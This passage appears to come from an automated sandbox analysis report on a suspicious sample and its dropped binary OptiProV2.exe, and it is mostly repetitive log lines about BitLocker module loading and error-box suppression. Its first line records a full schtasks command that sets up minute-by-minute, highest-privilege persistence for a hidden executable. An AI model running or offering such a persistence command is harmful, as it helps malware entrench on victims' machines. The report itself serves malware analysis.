                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Opti" /tr "C:\Users\user\AppData\Local\Opti.exe"

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
